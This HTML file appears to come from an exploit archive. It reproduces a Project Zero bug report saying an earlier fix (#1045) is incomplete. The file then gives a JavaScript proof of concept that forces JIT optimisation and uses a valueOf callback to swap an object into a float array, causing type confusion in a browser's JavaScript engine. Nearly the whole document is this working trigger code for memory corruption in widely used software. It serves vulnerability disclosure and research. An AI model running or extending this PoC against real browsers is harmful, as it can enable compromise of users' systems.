68 lines
No EOL
1 KiB
HTML
68 lines
No EOL
1 KiB
HTML
<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1290
|
|
|
|
I think the fix for #1045 is incorrect.
|
|
|
|
Here's the original PoC.
|
|
|
|
'use strict';
|
|
|
|
function func(a, b, c) {
|
|
a[0] = 1.2;
|
|
b[0] = c;
|
|
a[1] = 2.2;
|
|
a[0] = 2.3023e-320;
|
|
}
|
|
|
|
function main() {
|
|
var a = [1.1, 2.2];
|
|
var b = new Uint32Array(100);
|
|
|
|
// force to optimize
|
|
for (var i = 0; i < 0x10000; i++)
|
|
func(a, b, i);
|
|
|
|
func(a, b, {valueOf: () => {
|
|
a[0] = {};
|
|
|
|
return 0;
|
|
}});
|
|
|
|
a[0].toString();
|
|
}
|
|
|
|
main();
|
|
|
|
|
|
I just changed "var b = new Uint32Array(100);" to "var b = new Uint32Array(0);", and it worked well.
|
|
|
|
PoC:
|
|
-->
|
|
|
|
'use strict';
|
|
|
|
function func(a, b, c) {
|
|
a[0] = 1.2;
|
|
b[0] = c;
|
|
a[1] = 2.2;
|
|
a[0] = 2.3023e-320;
|
|
}
|
|
|
|
function main() {
|
|
var a = [1.1, 2.2];
|
|
var b = new Uint32Array(0); // <<--------- 100 -> 0
|
|
|
|
// force to optimize
|
|
for (var i = 0; i < 0x10000; i++)
|
|
func(a, b, i);
|
|
|
|
func(a, b, {valueOf: () => {
|
|
a[0] = {};
|
|
|
|
return 0;
|
|
}});
|
|
|
|
a[0].toString();
|
|
}
|
|
|
|
main(); |